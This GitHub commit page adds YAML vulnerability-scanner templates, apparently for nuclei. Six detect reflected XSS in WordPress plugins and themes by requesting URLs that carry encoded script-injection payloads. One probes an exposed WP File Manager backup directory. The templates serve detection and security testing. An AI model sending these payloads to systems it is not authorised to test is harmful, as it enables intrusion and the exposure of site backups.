-
Notifications
You must be signed in to change notification settings - Fork 273
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
dc2bed7
commit a4d1be1
Showing
14 changed files
with
450 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241215 | ||
20241216 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2011-5106 | ||
|
||
info: | ||
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
id: CVE-2013-4625 | ||
info: | ||
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625 | ||
tags: cve,cve2013,wordpress,xss,wp-plugin | ||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
id: CVE-2014-4550 | ||
info: | ||
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS | ||
author: daffainfo | ||
severity: medium | ||
reference: | | ||
- https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4550 | ||
tags: cve,cve2014,wordpress,wp-plugin,xss | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2014-4550 | ||
cwe-id: CWE-79 | ||
description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter." | ||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "'><script>alert(document.domain)</script>" | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
id: CVE-2016-1000133 | ||
|
||
info: | ||
name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 | ||
- https://wordpress.org/plugins/forget-about-shortcode-buttons | ||
- http://www.vapidlabs.com/wp/wp_advisory.php?v=602 | ||
- http://www.securityfocus.com/bid/93869 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2016-1000133 | ||
cwe-id: CWE-79 | ||
tags: cve,cve2016,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
id: CVE-2016-1000139 | ||
|
||
info: | ||
name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS | ||
author: daffainfo | ||
severity: medium | ||
reference: | ||
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a | ||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 | ||
tags: cve,cve2016,wordpress,wp-plugin,xss | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2016-1000139 | ||
cwe-id: CWE-79 | ||
description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11" | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- '"><script>alert(document.domain);</script><"' | ||
- 'input type="text" name="ContactId"' | ||
condition: and | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,40 @@ | ||
id: CVE-2020-17362 | ||
|
||
info: | ||
name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS. | ||
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 | ||
tags: cve,cve2020,wordpress,xss,wp-plugin | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2020-17362 | ||
cwe-id: CWE-79 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
words: | ||
- "nova-lite" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
id: CVE-2020-24312 | ||
|
||
info: | ||
name: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure | ||
author: x1m_martijn | ||
severity: high | ||
description: | | ||
mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken. | ||
reference: | ||
- https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ | ||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24312 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2020-24312 | ||
cwe-id: CWE-552 | ||
tags: cve,cve2020,wordpress,backups,plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- 'Index of' | ||
- 'wp-content/uploads/wp-file-manager-pro/fm_backup' | ||
- 'backup_' | ||
condition: and | ||
|
||
# Enhanced by mp on 2022/04/08 |
Oops, something went wrong.